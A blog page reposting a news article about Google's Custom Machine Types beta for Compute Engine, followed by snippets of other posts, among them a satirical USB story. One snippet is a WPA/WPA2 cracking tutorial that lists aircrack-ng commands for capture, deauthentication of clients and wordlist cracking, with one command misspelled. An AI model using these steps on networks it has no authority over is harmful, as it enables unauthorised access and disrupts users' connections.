Skip to main content

Google Launches Custom Machine Types For Its Cloud Platform


Google launched a new way of buying virtual machines in its cloud today.
No matter whether you choose the Google Cloud Platform, AWS, Azure or another player, the way you buy virtual machines is pretty much always the same: you pick from a limited set of pre-configured CPU and RAM options on machines that are either optimized for compute or memory.
With the newly launched beta of Custom Machine Types for Google’s Compute Engine, though, you will be able to pick exactly how many virtual CPUs (vCPUs) and how much RAM you want for you machine.
custom_machine_type-slider
Maybe you’ve outgrown the virtual machine with two vCPUs. Typically, you would have to step up to a machine type with four vCPUs, even if you only needed three. Because you don’t have a choice, you end up paying for more power than you need.
With its new Custom Machine Types, Google lets you specify exactly how many vCPUs (up to 32) and how much memory you need (up to 6.5 GiB per vCPU — Google likes to be precise, so it doesn’t use ‘gigabyte’ and instead specifies the number of gibibytes). If your needs change — as they inevitably will — you can adjust the number of cores and memory as needed.
Here is an example of what this looks like in terms of pricing:
custom_vms_google_cloud
The prices in this example are per-month costs for instances that run 100 percent of the month with Google’s sustained-use discount applied. Like all of Google’s virtual machines, Custom Machine Types feature per-minute billing, too, and you will be able to get extra discounts for using preemptible machines as well.
In the U.S. region, every vCPU hour will cost $0.03492 and every GiB of RAM will cost $0.00468 per hour. For preemptible machines, those prices drop to $0.01002 per vCPU/hour and $0.00156 per GiB/hour. The prices for Google’s European and Asian regions are a little bit higher ($0.03841 vs. $0.03492 per vCPU hour, for example).
Support for custom machine types is already available in Google’s command line tools and through its API. The company is still in the process of rolling out a graphical interface for setting these machines up in the Google Developer Console, but that, too, should be available in the next couple of days.


Developers will be able to choose between CentOS, CoreOS, Debian, OpenSUSE and Ubuntu as the operating systems for these machines.

Comments

Popular posts from this blog

eGym raises $45M Series C for cloud-connected gym equipment and fitness software

eGym , the Munich-based startup that offers cloud-connected gym equipment and supporting cloud software and app for the fitness training floor, has closed $45 million in Series C funding. The round was led by new investor HPE Growth Capital, while existing investors, including Highland Europe, also participated. The problem that eGym is looking to solve is that, whilst gyms have moved from a bodybuilder market to a mass market in the last 20 years, the technology in gyms lags behind. That’s despite the fact that better use of technology can help to reduce customer churn, the biggest pain-point of both gym operator and gym users. Comprising of an app for both gym user and trainer, combined with the company’s connected strength machines, the eGym Cloud makes it possible for gym members to receive better fitness instruction and an evolving and personalised fitness plan based on data collected as they workout. And by providing a better workout feedback loop, gym goers can get an i...

Careless USB removal causes multiple deaths

EIGHTEEN workers have died after a USB stick was removed from a computer without adequate precautions. The offices of Hereford-based Envision Photography were completely destroyed in the ensuing blast. Survivor Norman Steele said: “My colleague Helen had put some files on the stick to work on at home, and she yanked it out of the computer before anyone could scream ‘no’. “I kicked her aside as a jet of white-hot flame belched out of the USB port and set fire to the desk opposite. “Grabbing her, I dived through the window just before all the PCs in the network exploded with purple electricity that fried everyone in the building. “I sprinted to my car, knowing that the printers were already becoming merciless hunter-killer drones, shouting for Helen to follow. “But when I looked round I saw her frozen, something glowing in her hand, the awareness dawning of her fate. She was still holding the USB. “She detonated in a flash of ultraviolet light that turned eve...

Airbnb will open its Cuba listings to users outside the United States

Airbnb  will now let travelers from outside the U.S. to book properties in Cuba after receiving authorization from the U.S. government,  reports the Associated Press . Previously, only Americans were allowed to reserve the site’s  Cuban listings . They will open to international users on April 2. Airbnb launched its  Cuban operations in April 2014 , four months after the Obama administration revealed that it will begin to  restore diplomatic relations with the Communist country . The historic policy change means that  travel and trade sanctions will be lifted , which is expected to boost tourism to Cuba dramatically because Americans no longer need licenses to visit. In fact, President Obama is  currently on an official visit to Cuba , the first president since Calvin Coolidge to do so. According to the AP, Cuba is currently Airbnb’s fastest-growing market, with about 4,000 homes added since it opened listings. Other travel businesses...

Crack WPA & WPA2 with Aircrack-ng on Kali Linux

In this tutorial we are going to teach you How to crack WPA & WPA 2 with aircrack-ng on Kali Linux. We high recommend this for research or educational purpose only. Things we used for cracking WPA & WPA2: Alfa AWUSO36H Wireless Card Windows 7-64bit (works on 32bit) VMware Workstation Kali Linux 2.0 Command to crack WPA & WPA2: airmon-ng  sudo ifconfig wlan0 down sudo iwconfig wlan0 mode monitor sudo ifconfig wlan0 up airodump-ng wlan0  airodump-ng -c [channel id] --write [any name] --bssid [bssid of the wifi] wlan0 aireplay-ng --deauth 5 -a [bssid] -c [station id] wlan0 aircrack-ng -w [wordlist file] -b [bssid] [any name]-01.cap sudo ifconfig wlan0 down sudo iwcofnig wlan0 mode monitor sudo ifconfig wlan0 up  Here is a YouTube video on How to crack WPA and WPA2 with Aircrack-ng on Kali Linux: In the about tutorial we EVER hack our own systems as a proof of concept and never engage in any black hat activity.

Israel’s desert city of Beersheba is turning into a cybertech oasis

Israel’s first prime minister, David Ben Gurion famously said that the future of Israel lies in the Negev, a desert located in southern Israel. Ben Gurion’s prophetic words ring true today as Beersheba, Israel’s southern capital, is morphing into a tech oasis. The military’s massive relocation of its prestigious technology units, the presence of multinational and local companies, a close proximity to Ben Gurion University and generous government subsidies are turning Beersheba into a major global cybertech hub. Beersheba has all of the ingredients of a vibrant security technology ecosystem, including Ben-Gurion University with its  graduate program in cybersecurity  and  Cyber Security Research Center , and the presence of companies such as EMC, Deutsche Telekom, Paypal, Oracle, IBM, and Lockheed Martin. It’s also the future home of the INCB (Israeli National Cyber Bureau); offers a special income tax incentive for cyber security companies, and was the sit...